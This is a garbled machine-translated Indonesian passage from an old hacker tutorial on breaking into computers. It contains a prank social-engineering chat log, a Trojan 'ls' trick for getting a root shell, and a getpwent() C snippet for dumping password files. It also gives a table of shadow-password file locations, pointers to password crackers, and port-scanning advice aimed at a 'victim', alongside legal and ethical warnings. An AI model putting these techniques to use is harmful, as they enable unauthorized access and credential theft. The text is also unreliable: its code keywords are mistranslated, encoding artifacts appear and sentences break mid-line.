Jadi dengan ini dalam pikiran - bahwa Anda ingin lebih dari kehidupan daripada menjadi Lounge Lizard Larry dari dunia hacker
-
berikut adalah beberapa dasar untuk membobol komputer.
Ada banyak cara untuk menembus komputer.
Yang paling sederhana adalah dengan insinyur sosial Anda masuk. Ini biasanya melibatkan kebohongan. Ini sebuah contoh.
*******************************************
Dari: Oracle Service Humor List <oracle-list-return-@synapse.net>
Subjek: HUM: Perputaran AOL Hacker (***)
Baca penguasaan tabel Newfpyr yang ahli pada peretas ...
Tentu saja salah satu IM Absurd terbaik yang pernah kami terima! Komentar Newfpyr ada di dalam kurung
sepanjang.
Zabu451: Halo dari America Online! Saya menyesal memberi tahu Anda bahwa ada kesalahan di bagian I / O
dari basis data akun Anda, dan informasi kata sandi server ini telah dihancurkan untuk sementara waktu. Kita butuh
Anda, pengguna AOL, untuk membalas dan ketik kata sandi Anda. Terimakasih atas
membantu.

Halaman 186
Newfpyr: Halo! Ini adalah Server Manager # 563. Saya menyesal mendengar bahwa server Anda telah kehilangan info kata
sandi. saya
Maksudnya, ini telah terjadi terlalu banyak akhir-akhir ini. Kami telah mengembangkan beberapa solusi untuk masalah ini.
Memiliki
Anda mendapat surat yang dikirim ke semua manajer server?
Zabu451: tidak
NewfPyr: Benarkah? Aduh. Ada beberapa masalah dengan mailer server akhir-akhir ini. Baiklah. Inilah solusinya
untuk masalah ini: coba sambungkan database cadangan Anda ke port I / O utama Anda, kemudian akses sistem
mengulang kembali.
Zabu451: tidak, saya masih membutuhkan kata sandi
NewfPyr: Begitu. Apakah Anda ingin saya mengirimkan daftar semua kata sandi semua nama layar Anda?
server?
Zabu451: ya saya ingin itu
NewfPyr: Biarkan saya meminta manajer server untuk mengirimnya ...
NewfPyr: Dia bilang saya perlu kata sandi manajer server Anda. Bisakah Anda mengetiknya?
Zabu451: saya tidak punya
NewfPyr: Apa maksud Anda? Itulah hal pertama yang didapat setiap manajer!
Zabu451: terhapus
NewfPyr: Wow! Anda pasti mengalami banyak masalah. Biarkan saya mencari tahu server apa yang Anda gunakan ...
[Catatan: Saya memeriksa profilnya. Katanya dia dari Springfield, Mass.]
NewfPyr: Oke, nomor Anda telah dilacak ke suatu daerah di Springfield, Mass.
Zabu451: bagaimana kamu tahu? !!!?!? !!?!?!?!?! ?? !!
NewfPyr: Saya menggunakan Server Tracker 5.0. Apakah kamu tidak memilikinya?
Zabu451: Anda tahu alamat saya!?!?!? !!?!?
NewfPyr: Tentu saja tidak.
Zabu451: bagus
NewfPyr: Saya hanya tahu nomor yang Anda panggil AOL, yang dari server Anda, kan?
Zabu451: ya
NewfPyr: Bagus. Oke, sekarang kami memiliki nomor Anda, kami memiliki alamat Anda, dan kami mengirimkan perbaikan
tim di sana.
Zabu451: nonononono jangan hentikan mereka sekarang
NewfPyr: Mengapa? Bukankah server Anda rusak?

Halaman 187
Zabu451: nonono itu berfungsi sekarang
NewfPyr: Mereka masih akan datang, untuk berjaga-jaga.
Zabu451: BERHENTI MEREKA SEKARANG
NewfPyr: Saya tidak bisa melanggar Kebijakan AOL.
Zabu451: JUDUL DATANG KE RUMAH SAYA?!?!?!?! ??
NewfPyr: Tidak! Ke server Anda. Anda tahu, dari mana Anda menelepon AOL.
Zabu451: aku menelepon dari rumahku
NewfPyr: Tapi Anda bilang di mana menelepon dari server!
Zabu451: Aku berbohong aku bukan orang server
NewfPyr: Tapi Anda bilang begitu!
Zabu451: saya berbohong saya mencoba untuk mendapatkan kata sandi tolong buat mereka berhenti
NewfPyr: Oke. Tim perbaikan tidak akan datang lagi.
Zabu451: bagus
NewfPyr: Tapi tim agen FBI adalah.
Zabu451: NONONONO
Zabu451: maaf
Zabu451: sakit tidak pernah melakukannya lagi tolong buat mereka tidak datang
Zabu451: TOLONG IL BERHENTI MEMINTA PASSWORDS SELAMANYA, MEMBUAT MEREKA !!
NewfPyr: Maaf, saya tidak bisa melakukan itu. Mereka harus berada di rumah Anda dalam 5 menit.
Zabu451: MAAF AKU MELAKUKAN APA SAJA, TOLONG SAYA TIDAK INGIN MEREKA
Zabu451: TOLONG
Zabu451: PLEEEEEEEEEEEEEEEEAAAAAAAAASSSSSSSSE
NewfPyr: Mereka tidak akan menyakiti Anda! Anda mungkin hanya akan menghabiskan satu tahun penjara.
Zabu451: no IM ONLY A KID
NewfPyr: Anda? Itu membuatnya berbeda. Anda tidak akan masuk penjara selama setahun.
Zabu451: Saya juga
NewfPyr: Anda akan pergi selama dua tahun.
Zabu451: Tidak! MAAFKAN SAYA
Zabu451: HARAP MEMBUAT MEREKA
Zabu451: TOLONG
[Saya pikir ini sudah cukup. Dia mungkin mengompol di celananya.]

Halaman 188
NewfPyr: Karena ini adalah pelanggaran pertama kali, saya pikir saya dapat membatalkan tuntutan.
Zabu451: ya
Zabu451: thankyouthankyouthankyou
NewfPyr: Agen FBI telah ditarik. Jika Anda melakukannya lagi, kami akan menghabisi Anda.
Zabu451: saya tidak akan minta maaf selamat tinggal
[Dia segera menandatangani.]
Salah satu kesempatan RARE RARE yang membuat kami merasa kasihan pada peretas. TUJUH LIMA TOKENS ke
Anda, NewfPyr! Kami MASIH tertawa - terima kasih banyak!
Diserahkan oleh: Fran CMT @ aol.com
(Ingin lebih banyak humor ini dalam nada jugularis? Lihat http://www.netforward.com/poboxes/?ablang)
*****************************************
Mungkin Anda terlalu malu untuk bertindak seperti hacker rekayasa sosial AOL yang khas. Oke, mungkin Anda
siap untuk mencoba Trojan Horse. Ini adalah jenis serangan di mana program yang tampaknya melakukan sesuatu
sah telah diubah untuk menyerang komputer.
Misalnya, pada akun shell Unix Anda mungkin meletakkan Trojan di direktori home Anda yang bernama "ls."
katakan dukungan teknis bahwa ada sesuatu yang lucu terjadi di direktori home Anda. Jika orang dukungan teknis
cukup mengerti, ia dapat masuk ke akun Anda saat ia memiliki izin root. Dia kemudian memberi perintah
"Ls" untuk melihat apa yang ada di sana. Menurut Damien Sorder, “Ini hanya akan bekerja tergantung
pada pernyataan 'PATH' untuk cangkangnya. Jika dia mencari '.' sebelum '/ bin', maka itu akan berhasil. Lain lagi, tidak akan. ”
Menganggap sysadmin telah ceroboh ini, dan jika Trojan Anda ditulis dengan baik, itu akan memanggil ls nyata
program untuk menampilkan info file Anda - sambil juga menelurkan shell root untuk Anda gunakan sendiri!
************************************************ *
Catatan pemula: jika Anda bisa masuk ke shell root Anda bisa melakukan apa saja - APA SAJA - ke komputer korban Anda.
Sayangnya, ini berarti sangat mudah untuk mengacaukan sistem Unix saat beroperasi sebagai root. Sistem yang baik
administrator akan memberinya hak root hanya jika benar-benar diperlukan untuk melakukan tugas.
Trojans hanyalah satu dari banyak alasan untuk kehati-hatian ini. Sebelum Anda mengundang teman Anda untuk meretas kotak
Anda,
Bersiaplah untuk apa pun, dan maksud saya APA SAJA, untuk menjadi kacau bahkan dengan maksud yang paling baik
teman.
************************************************ *
Serangan lain adalah memasang program sniffer di host Internet dan mengambil kata sandi. Ini artinya
kapan saja Anda ingin masuk ke komputer dari komputer lain dengan menggunakan telnet, kata sandi Anda ada di
belas kasihan dari setiap program sniffer yang dapat diinstal pada komputer mana pun yang dilalui kata sandi Anda.
Namun, untuk mengatur sniffer Anda harus me-root pada kotak Unix yang diinstal. Jadi serangan ini
jelas bukan untuk pemula.
Untuk mendapatkan gambaran tentang berapa banyak komputer “melihat” kata sandi Anda ketika Anda telnet ke akun jarak jauh
Anda,
berikan perintah (pada sistem Unix) "traceroute my.computer" ("tracert" di Windows 95) tempat Anda
ganti nama komputer yang Anda rencanakan untuk masuk ke "komputer saya."

Halaman 189
Terkadang Anda mungkin menemukan bahwa ketika Anda melakukan telnet dari satu komputer ke komputer lainnya bahkan di
dalam kota Anda
tinggal di, Anda dapat melewati selusin atau lebih komputer! Misalnya, ketika saya melacak rute dari sebuah
Sesi Albuquerque AOL ke kotak Linux favorit saya di Albuquerque, saya dapatkan:
C: \ WINDOWS> tracert fubar.com
Menelusuri rute ke fubar.com [208.128.xx.61]
lebih dari maksimum 30 hop:
1 322 ms 328 ms 329 ms ipt-q1.proxy.aol.com [152.163.205.95]
2 467 ms 329 ms 329 ms tot-ta-r5.proxy.aol.com [152.163.205.126]
3 467 ms 323 ms 328 ms f4-1.t60-4.Reston.t3.ans.net [207.25.134.69]
4 467 ms 329 ms 493 ms h10-1.t56-1.Washington-DC.t3.ans.net [140.223.57
.25]
5 469 ms 382 ms 329 ms 140.222.56.70
6 426 ms 548 ms 437 ms core3.Memphis.mci.net [204.70.125.1]
7 399 ms 448 ms 461 ms core2-hssi-2.Houston.mci.net [204.70.1.169]
8 400 ms 466 ms 512 ms border7-fddi-0.Houston.mci.net [204.70.191.51]
9 495 ms 493 ms 492 ms amerika-comm-svc.Houston.mci.net [204.70.194.86
]
10 522 ms 989 ms 490 ms webdownlink.foobar.net [208.128.37.98]
11 468 ms 493 ms 491 ms 208.128.xx.33
12 551 ms 491 ms 492 ms fubar.com [208.128.xx.61]
Jika seseorang menaruh sniffer di komputer mana pun pada rute itu, mereka bisa mendapatkan kata sandi saya! Sekarang kamu
juga
ingin pergi berkeliling dari satu akun Anda ke yang lain?
Solusi untuk masalah ini adalah dengan menggunakan Secure Shell. Ini adalah program yang dapat Anda unduh secara gratis
http://escert.upc.es/others/ssh/. Menurut literatur promosi, "Ssh (Secure Shell) adalah program untuk
masuk ke komputer lain melalui jaringan, untuk menjalankan perintah di mesin jarak jauh, dan untuk memindahkan file dari
satu mesin ke mesin lainnya. Ini memberikan otentikasi yang kuat
dan mengamankan komunikasi melalui saluran yang tidak aman. "
Jika Anda ingin mendapatkan kata sandi di komputer yang Anda tahu sedang diakses dari jarak jauh oleh orang yang
menggunakan
Windows 3.X, dan jika menggunakan Trumpet Winsock, dan jika Anda bisa mendapatkan akses fisik ke kotak Windows itu,
ada cara super mudah untuk mengungkap kata sandi. Anda dapat menemukan detailnya, yang sangat mudah
tiup kaus kakimu, di arsip Bugtraq. Cari entri berjudul “Masalah kata sandi di Tru mpet
Winsock. "Arsip-arsip ini ada di http://www.netspace.org/lsv-archive/bugtraq.html
Cara lain untuk masuk ke komputer adalah untuk mendapatkan seluruh file kata sandi. Tentu saja file passwordnya
terenkripsi. Tetapi jika komputer target Anda tidak menjalankan program untuk mencegah orang memilih dengan mudah
kata sandi, mudah untuk mendekripsi banyak kata sandi.
Tetapi bagaimana Anda mendapatkan file kata sandi? Administrator sistem yang baik akan menyembunyikannya dengan baik
sehingga bahkan pengguna di Internet
mesin yang menahan mereka tidak dapat dengan mudah mendapatkan file.
Cara paling sederhana untuk mendapatkan file kata sandi adalah dengan mencuri rekaman cadangan dari korban Anda. Ini salah
satu alasannya
sebagian besar kerusakan komputer dilakukan oleh orang dalam.
Namun seringkali mudah untuk mendapatkan seluruh file kata sandi LAN dari jarak jauh di Internet. Kenapa harus
ini benar? Pikirkan tentang apa yang terjadi ketika Anda masuk. Bahkan sebelum komputer tahu siapa Anda, Anda
harus dapat memerintahkannya untuk membandingkan nama pengguna dan kata sandi Anda dengan file kata sandinya.

Halaman 190
Apa yang dilakukan komputer adalah melakukan operasi enkripsi pada kata sandi yang Anda masukkan dan kemudian
membandingkannya
dengan entri terenkripsi dalam file kata sandi. Jadi, seluruh dunia harus memiliki akses entah bagaimana untuk ini
file kata sandi terenkripsi. Pekerjaan Anda sebagai calon cracker adalah mencari tahu nama file ini dan kemudian mendapatkan
komputer target Anda untuk mengirimkan file ini kepada Anda.
Tutorial tentang cara melakukan ini, yang diterbitkan di ezine KRACK (diproduksi oleh od ^ pheak
<butler@tir.com>), ikuti. Komentar dalam tanda kurung telah ditambahkan ke teks KRACK.
*******************************************
Strategi Untuk Mendapatkan Root Dengan Passwd yang dibayangi
Langkah 1
ftp anonim ke server dapatkan passwd
[Langkah ini hampir tidak akan pernah berhasil, tetapi bahkan serangan paling sederhana pun patut dicoba.]
Langkah 2
Untuk mengalahkan pembayangan kata sandi di banyak sistem (tetapi tidak semua), tulis sebuah program yang menggunakan
panggilan berurutan
getpwent () untuk mendapatkan file kata sandi.
Contoh:
#termasuk <pwd.h>
utama()
{
passwd struct * p;
while (p = 3Dgetpwent ())
printf ("% s:% s:% d:% d:% s:% s:% s \ n", p-> pw_name,
p-> pw_passwd,
p-> pw_uid, p-> pw_gid, p-> pw_gecos, p-> pw_dir,
p-> pw_shell);
}
Atau Anda dapat Mencari Cadangan Tidak Rusak .....
[Daftar kemungkinan tempat berikut untuk menemukan cadangan yang tidak ditampilkan tersedia dari “Retasan FAQ” yang
ditulis
oleh Voyager. Ini dapat diperoleh dari http: //
www-personal.engin.umich.edu/~jgotts/hack-faq]
Unix
Path
membutuhkan Token
-------------------------------------------------- --------------------
AIX 3
/ etc / security / passwd
!
atau
/ tcb / auth / files / <huruf pertama #
nama pengguna> / <nama pengguna>
A / UX 3.0s
/ tcb / file / auth /? /
*
BSD4.3-Reno
/etc/master.passwd
*
ConvexOS 10
/ etc / shadpw
*
ConvexOS 11
/ etc / shadow
*
DG / UX
/ etc / tcb / aa / user /
*
EP / IX
/ etc / shadow
x
HP-UX
/.secure/etc/passwd
*

Halaman 191
IRIX 5
/ etc / shadow
x
Linux 1.1
/ etc / shadow
*
OSF / 1
/etc/passwd[.dir|.pag]
*
SCO Unix # .2.x
/ tcb / auth / files / <huruf pertama *
nama pengguna> / <nama pengguna>
SunOS4.1 + c2
/etc/security/passwd.adjunct =
##nama pengguna
SunOS 5.0
/ etc / shadow
<opsional NIS + pribadi aman
peta / tabel / apa pun>
System V Release 4.0 / etc / shadow
x
System V Release 4.2 / etc / security / * database
Ultrix 4
/etc/auth[.dir|.pag]
*
UNICOS
/ etc / udb = 20
Langkah # 3
memecahkannya
[Lihat di bawah untuk petunjuk tentang cara memecahkan file kata sandi.]
************************************************
Jadi katakanlah Anda telah berhasil mendapatkan file kata sandi terenkripsi. Bagaimana Anda mengekstrak kata sandi?
Contoh salah satu dari banyak program yang dapat memecahkan kata sandi yang dipilih dengan buruk adalah Unix Password
Cracker
oleh Scooter Corp. Ini tersedia di
ftp://ftp.info.bishkek.su/UNIX/crack-2a/crack-2a.tgz
atau http://iukr.bishkek.su/crack/index.html
Tutorial yang bagus tentang beberapa masalah pemecahan kata sandi Windows NT dapat ditemukan di
http://ntbugtraq.rc.on.ca/samfaq.htm
Salah satu cracker kata sandi untuk Windows NT adalah L0phtcrack v1.5. Ini tersedia secara GRATIS dari
http://www.L0pht.com (itu NOL setelah 'L', bukan 'o'). Itu datang dengan sumber sehingga Anda bisa membangunnya dengan
adil
tentang platform apa pun. Penulis adalah mudge@l0pht.com dan weld@l0pht.com.
Pemecah kata sandi Windows NT lainnya adalah Alec Muffett
Crack 5.0 di http://www.sun.rhbnc.ac.uk/~phac107/c50a-nt-0.10.tgz
Bahkan jika Anda memecahkan beberapa kata sandi, Anda masih perlu menghubungkan kata sandi dengan nama pengguna. Satu
jalan menuju
lakukan ini untuk mendapatkan daftar pengguna dengan meraba komputer target Anda. Lihat GTMHH Vol.1 No.1 untuk
beberapa cara
untuk jari sebanyak mungkin pengguna pada suatu sistem. Perintah verifikasi dalam sendmail adalah cara lain untuk
mendapatkan pengguna
nama. Administrator sistem yang baik akan mematikan daemon jari dan perintah verifikasi sendmail
untuk membuat lebih sulit bagi orang luar untuk masuk ke komputer mereka.
Jika jari dan perintah verifikasi dinonaktifkan, masih ada cara lain untuk mendapatkan nama pengguna. Seringkali
bagian dari email seseorang yang datang sebelum "@" juga akan menjadi nama pengguna.
Jika pemecahan kata sandi tidak berfungsi, ada banyak - terlalu banyak - cara lain untuk membobol komputer.
Berikut ini adalah beberapa saran tentang cara mempelajari teknik-teknik ini.

Halaman 192
1. Pelajari sebanyak mungkin tentang komputer yang Anda targetkan. Cari tahu sistem operasi apa yang dijalankannya;
apakah itu di jaringan area lokal; dan program apa yang sedang dijalankan. Yang paling penting adalah port
yang terbuka dan daemon berjalan pada mereka.
Misalnya, jika Anda bisa mendapatkan akses fisik ke komputer, Anda selalu dapat mengendalikannya dengan satu cara atau
lain. Lihat GTMHH pada Windows untuk banyak contoh. Apa artinya ini, tentu saja, adalah jika Anda memilikinya
sesuatu di komputer Anda Anda benar-benar, secara positif tidak ingin orang membaca, Anda sebaiknya mengenkripsi
dengan RSA. Bukan PGP, RSA. Maka Anda harus berharap tidak ada yang menemukan cara cepat untuk faktor angka (angka
matematis Achilles Heel dari RSA dan PGP).
Jika Anda tidak bisa mendapatkan akses fisik, taruhan terbaik Anda berikutnya adalah jika Anda menggunakan LAN yang sama.
Bahkan, sebagian besar
pemecahan komputer dilakukan oleh orang-orang yang merupakan karyawan perusahaan yang menjalankan LAN itu
dimana komputer korban terpasang. Kesalahan paling umum dari para profesional keamanan komputer adalah untuk
mengatur firewall terhadap dunia luar sambil membiarkan LAN mereka terbuka lebar untuk serangan orang dalam.
Catatan penting: jika Anda memiliki satu kotak Windows 95 di LAN Anda, Anda bahkan tidak bisa mulai berpura-pura
memiliki jaringan yang aman. Itu sebagian besar karena akan berjalan dalam mode DOS, yang memungkinkan setiap pengguna
untuk membaca,
tulis dan hapus file.
Jika komputer yang Anda targetkan ada di Internet, langkah Anda berikutnya adalah menentukan bagaimana itu
terhubung ke Internet. Masalah paling penting di sini adalah port TCP / IP apa yang terbuka dan daemon apa
jalankan di port ini.
************************************************ *
Catatan pemula: Port TCP / IP sebenarnya adalah protokol yang digunakan untuk mengarahkan data ke dalam program yang
disebut "daemon" itu
Jalankan semua waktu komputer host Internet dihidupkan dan terhubung ke Net, menunggu masuk atau
data keluar untuk mendorongnya ke tindakan.
Contoh dari port TCP / IP adalah nomor 25, yang disebut SMTP (protokol transport surat sederhana). Contoh dari a
daemon yang dapat melakukan hal-hal menarik ketika mendapat data di bawah SMTP adalah sendmail. Lihat GTMHH di
memalsukan email untuk contoh cara menyenangkan untuk bermain * secara legal * dengan port 25 di komputer orang lain.
Untuk daftar lengkap port TCP / IP yang umum digunakan, lihat RFC 1700. Satu tempat Anda dapat mencarinya adalah
http://ds2.internic.net/rfc/rfc1700.txt
************************************************ **
2. Memahami sistem operasi komputer yang Anda rencanakan untuk diretas. Tentu, banyak orang yang bodoh
pada sistem operasi masuk ke komputer dengan menggunakan program kalengan terhadap kotak yang sangat rentan. Sebagai
seorang hacker remaja memberi tahu saya setelah kembali dari Def Con V, “Banyak orang di sana bahkan tidak tahu 'kucing'
perintah!"
Siapa pun dapat membobol komputer di suatu tempat jika mereka tidak memiliki kebanggaan atau etika. Kami menganggap
Anda lebih baik
daripada itu. Jika breakin begitu mudah, Anda dapat melakukannya tanpa tahu apa perintah "cat", Anda
bukan seorang hacker. Anda hanya perusak komputer.
3. Pelajari cara orang lain membobol komputer dengan sistem operasi dan perangkat lunak itu. Itu
arsip terbaik dari teknik breakin untuk Unix adalah Bugtraq http://www.netspace.org/lsv-archive/bugtraq.html.
Untuk Windows NT, periksa http://ntbugtraq.rc.on.ca/index.html.
Jalan pintas parsial yang murah dan mudah untuk proses belajar yang sulit ini adalah menjalankan program yang memindai port
komputer target Anda, cari tahu daemon apa yang sedang berjalan pada setiap port, dan kemudian memberi tahu Anda apakah
ada
adalah teknik breakin yang diketahui ada untuk daemon tersebut. Setan itu baik, dan benar-benar gratis. Kamu bisa
unduh dari ftp://ftp.fc.net/pub/defcon/SATAN/ atau bazillion situs hacker ftp lainnya.

Halaman 193
Port scanner hebat lainnya adalah Internet Security Scanner. Ini ditawarkan oleh Sistem Keamanan Internet
Norcross, Georgia USA, 1-800-776-2362. Alat ini menghabiskan banyak uang, tetapi merupakan pemindai keamanan pilihan
dari orang-orang yang ingin mencegah peretas. Anda dapat mencapai ISS di http://www.iss.net/.
Sistem Keamanan Internet juga menawarkan beberapa program gratis. SAFEsuite Scanner Internet "Localhost"
diatur untuk hanya menjalankan pemindaian keamanan pada komputer Unix yang diinstal (hack kotak Anda!) Anda bisa
dapatkan dari http://www.blanket.com/iss.html. Anda bisa mendapatkan salinan beta gratis dari pemindai mereka untuk Win NT
di
http://www.iss.net/about/whatsnew.html#RS_NT.
Secara teori program ISS diatur sehingga Anda hanya dapat menggunakannya paling banyak untuk menyelidiki jaringan
komputer yang Anda miliki.
Namun, beberapa bulan yang lalu saya mendapat laporan yang kredibel bahwa perusahaan raksasa yang menggunakan ISS untuk
menguji kotaknya
tulang punggung Internet secara tidak sengaja mematikan ISP di El Paso dengan serangan banjir sin ISS otomatis.
Jika Anda ingin mendapatkan port scanner dari tempat kecil yang sepi, cobalah http://204.188.52.99. Ini menawarkan
Asmodeus Network Security Scanner untuk Windows NT 4.0.
Di sebagian besar tempat, adalah sah untuk memindai port-port komputer orang lain. Meskipun demikian, jika Anda menjalankan
Setan atau
alat pemindaian port lain terhadap komputer yang tidak dapat Anda aksesi, mungkin Anda dapatkan
menggebrak ISP Anda.
Sebagai contoh, baru-baru ini seorang peretas Irlandia menjalankan "audit keamanan" dari ISP Emerald Island. Dia adalah
mungkin melakukan ini dengan tulus. Ia mengirimi setiap target email tentang kerentanan yang ia temukan. Tapi
ketika auditor keamanan freelance ini memeriksa ISP yang dimiliki oleh salah satu teman saya, ia menendang hacker itu
dari ISP-nya.
“Tapi mengapa memberinya waktu yang sulit untuk hanya melakukan scan keamanan? Dia mungkin telah membangunkan
seorang administrator atau
dua, "aku bertanya pada temanku.
"Untuk alasan yang sama, mereka membuat F-16 untuk bogie," jawabnya.
Cara saya mengatasi masalah membuat orang marah dari pemindaian port adalah melakukannya dengan tangan menggunakan a
program telnet. Banyak GTMHH menunjukkan contoh pemindaian porta dengan tangan. Ini memiliki keunggulan
bahwa kebanyakan administrator sistem menganggap Anda hanya ingin tahu.
Namun, beberapa memiliki daemon yang diatur sehingga setiap kali Anda memindai bahkan satu port dari kotak mereka, itu
secara otomatis mengirim email ke administrator sistem dari ISP yang Anda gunakan mengeluh bahwa Anda mencoba
menerobos masuk - dan email lain kepada Anda memberitahu Anda untuk menyerahkan diri!
Solusi untuk ini adalah dengan menggunakan IP spoofing. Tapi karena saya yakin Anda hanya akan mencoba masuk
komputer di mana Anda memiliki izin untuk melakukannya, Anda tidak perlu tahu cara menipu alamat IP Anda.
************************************************ ****
Anda mungkin tertawa sendiri peringatan konyol: Jika Anda port scan dengan tangan terhadap obscure.sekurity.org, Anda dapat
lari
menjadi beberapa daemon lucu diinstal pada nomor port tinggi yang aneh.
************************************************ ****
4. Sekarang Anda tahu program rentan apa yang berjalan pada komputer target Anda, selanjutnya Anda perlu
putuskan program apa yang Anda gunakan untuk masuk.
Tapi bukankah para hacker jenius yang brilian menemukan cara baru untuk membobol komputer? Ya, ada beberapa. Tetapi
rata-rata peretas bergantung pada program yang ditulis peretas lainnya untuk melakukan perbuatan mereka. Itu sebabnya, dalam
buku ini
Penghapusan, beberapa peretas (mungkin Kevin Mitnick, mungkin tidak) masuk ke komputer Tsutomu Shimomura
mencuri program untuk mengubah ponsel Nokia menjadi pemindai yang bisa menguping ponsel orang lain
panggilan.

Halaman 194
Di sinilah zillions halaman web hacker ikut bermain. Lakukan pencarian web untuk "hacker" dan "haxor"
dan "h4ck3r" dll. Anda dapat menghabiskan waktu berbulan-bulan mengunduh semua program dengan nama yang menjanjikan
seperti "IP
spoofer. "
Sayangnya, Anda mungkin mengalami satu atau dua kejutan buruk. Ini mungkin mengejutkan Anda, tetapi beberapa
dari orang-orang yang menulis program yang digunakan untuk masuk ke komputer tidak persis Eagle Scouts.
Misalnya, tempo hari seorang lelaki yang akan tetap tanpa nama menulis kepada saya, “Saya menemukan seseorang telah
menjarah dir saya, di mana saya mengunggah barang untuk teman jadi saya akan meninggalkan kejutan kecil yang
menyenangkan untuknya di
program yang terlihat sangat keren;) (jika Anda tahu maksud saya) ”
Tetapi katakanlah Anda mengunduh program yang menjanjikan untuk mengeksploitasi celah keamanan yang baru saja Anda
temukan dengan Setan
memindai. Katakanlah Anda tidak akan menghancurkan semua file Anda dari kejutan kecil yang menyenangkan. Tugas Anda
selanjutnya mungkin
untuk mendapatkan program exploit ini untuk dikompilasi dan dijalankan.
Sebagian besar program komputer breakin berjalan di Unix. Dan ada banyak rasa Unix yang berbeda. Untuk setiap rasa
Unix Anda dapat mencampur atau mencocokkan beberapa shell yang berbeda. (Jika tidak ada yang masuk akal bagi Anda, lihat
GTMHH
tentang cara mendapatkan akun shell yang baik.) Masalahnya adalah bahwa program ditulis untuk dijalankan, misalnya, csh
shell di Solaris Unix tidak dapat berjalan dari bash shell di Slackware Linux atau shell tcsh di Irix, dll.
Mungkin juga orang yang menulis program breakin itu mungkin memiliki hati nurani. Dia mungkin memilikinya
mengira sebagian besar orang ingin menggunakannya dengan jahat. Jadi mereka membuat sedikit perubahan kecil
program, misalnya mengomentari beberapa baris. Jadi Tuan / Ibu. Hati Nurani yang Lembut dapat merasakan itu saja
orang yang tahu bagaimana memprogram akan dapat menggunakan perangkat lunak yang mengeksploitasi itu. Dan seperti kita
semua tahu, komputer
programmer tidak akan pernah melakukan sesuatu yang jahat dan mengerikan pada komputer orang lain.
Jadi ini membawa kita ke hal berikutnya yang harus Anda ketahui untuk masuk ke komputer.
5. Pelajari cara memprogram! Bahkan jika Anda menggunakan program eksploitasi orang lain, Anda mungkin perlu men-tweak
sesuatu atau
dua untuk membuat mereka lari. Dua bahasa yang paling umum untuk program eksploitasi mungkin adalah C (atau C ++) dan
Perl.
******************************************
Catatan pemula: Jika Anda tidak dapat menjalankan program yang baru saja Anda unduh untuk dijalankan, mungkin program itu
dirancang untuk dijalankan
pada sistem operasi Unix, tetapi Anda menjalankan Windows. Tip bagus bahwa ini mungkin masalah Anda
adalah nama file yang berakhir dengan ".gz".
******************************************
Jadi, apakah semua ini berarti bahwa membobol komputer benar-benar sulit? Apakah semua ini berarti bahwa jika Anda istirahat
ke dalam komputer seseorang Anda telah membuktikan kedewasaan digital Anda (atau kewanitaan)?
Tidak. Beberapa komputer sangat mudah untuk dibobol. Tetapi jika Anda membobol komputer yang kurang terlindungi
Dijalankan oleh dunces, yang telah Anda buktikan adalah bahwa Anda kurang enak dan suka masuk ke jenis yang benar-benar
bodoh
kesulitan. Namun, jika Anda berhasil membobol komputer yang dikelola dengan baik, dan yang Anda miliki
izin untuk menguji, Anda sedang menuju karir yang bergaji tinggi dalam keamanan komputer.
Ingat ini! Jika Anda tertangkap karena membobol komputer, Anda berada dalam masalah besar. Bahkan jika Anda
mengatakannya
Anda tidak membahayakan. Bahkan jika Anda mengatakan Anda membuat komputer lebih baik saat Anda berkeliaran di
dalamnya. Dan
peluang Anda untuk menjadi profesional keamanan komputer turun hampir ke nol. Dan - apakah Anda punya
Gagasan tentang betapa mahalnya pengacara?

Halaman 195
Saya bahkan belum memberi petunjuk dalam tutorial ini tentang cara agar tidak ketahuan. Paling tidak sulit untuk menutupi
trek seperti itu untuk masuk ke komputer. Jadi, jika Anda harus membaca ini untuk mempelajari cara masuk ke komputer, Anda
akan berakhir di dunia yang terluka jika Anda menggunakan ini untuk masuk tanpa izin di komputer orang lain.
Jadi, ke arah mana Anda berencana untuk pergi? Dikenal sebagai orang baik, menghasilkan banyak uang, dan memiliki semua itu
menyenangkan hacker yang bisa Anda bayangkan?
Atau apakah Anda akan menyelinap dalam gelap, memaksa masuk ke komputer orang asing, miskin, takut,
marah? Pecah? Menatap tagihan hukum astronomi?
Jika Anda menyukai alternatif yang kaya dan bahagia, lihat kembali masalah Happy Hacker Digests untuk melihat apa
komputer terbuka untuk umum untuk dicoba masuk. Kami juga akan membuat pengumuman baru saat kami temukan
mereka.
Dan jangan lupa mencoba memecahkan obscure.sekurity.org. Tidak ada yang berhasil memecahkannya ketika menyerang
bagian luar. Saya juga tidak tahu bagaimana masuk ke dalamnya. Anda mungkin harus menemukan exploit baru
menembus pertahanannya.
Tetapi jika Anda melakukannya, Anda akan mengalami sensasi yang jauh lebih besar daripada membobol Slobovian Bawah
kotak 386 pebisnis yang menjalankan Linux 2.0 dengan sendmail 4. apa pun. Tunjukkan ksatria dan tolong jangan
memukuli orang yang tak berdaya, oke? Dan menjauhlah dari penjara atau kita semua akan mengolok-olok Anda ketika Anda
tertangkap.
Tentu saja Panduan ini nyaris tidak menyentuh permukaan komputer. Kami bahkan belum menyentuh
topik seperti cara mencari pintu belakang yang mungkin disembunyikan cracker lain di komputer target Anda, atau
keystroke grabbers, atau serangan melalui kode berbahaya yang mungkin Anda temui saat menjelajah Web. (Belok
off Java di browser Anda! Tidak pernah, pernah menggunakan Internet Explorer.) Tapi mungkin beberapa dari Anda tipe
ubergenius
membaca ini dapat membantu kami. Berharap untuk mendengar dari Anda!
____________________________________________________________
Peringatan! Gunakan informasi ini dengan risiko Anda sendiri. Berhati-hatilah karena mencoba ini pada Slobovian Bawah
komputer pengusaha dan kita semua akan mengolok-olok Anda, saya janji! Itu berlaku ganda untuk Slobovian Atas
kotak !!
____________________________________________________________
PANDUAN UNTUK (kebanyakan) HACKING HARMLESS
Vol. 3 No. 6
Bagaimana Menjadi Pahlawan di Lab Komputer
____________________________________________________________
Jika Anda seorang siswa, Anda tahu Anda bisa mendapat masalah jika Anda meretas komputer sekolah Anda. Tetapi jika Anda
bisa
meyakinkan guru Anda bahwa Anda adalah orang baik yang akan membantu melindungi mereka dari pengacau digital, Anda bisa
menjadi pahlawan. Anda bahkan dapat memperoleh izin mereka untuk mencoba teknik pembobolan.
************************************************ **********
Dalam Panduan ini Anda akan belajar cara:
· Kustomisasi logo animasi di Internet Explorer
· Mengurangi program keamanan melalui Internet Explorer
· Mengurangi program keamanan melalui program Microsoft Office apa pun
· Circumvent FoolProof
· Circumvent Full Armor
· Selesaikan masalah pengasuh web
· Masuk ke komputer sekolah sepenuhnya.
· Menghindari peretas kiddie yang tidak mengerti mengacaukan sistem komputer sekolah Anda

Halaman 196
************************************************ **********
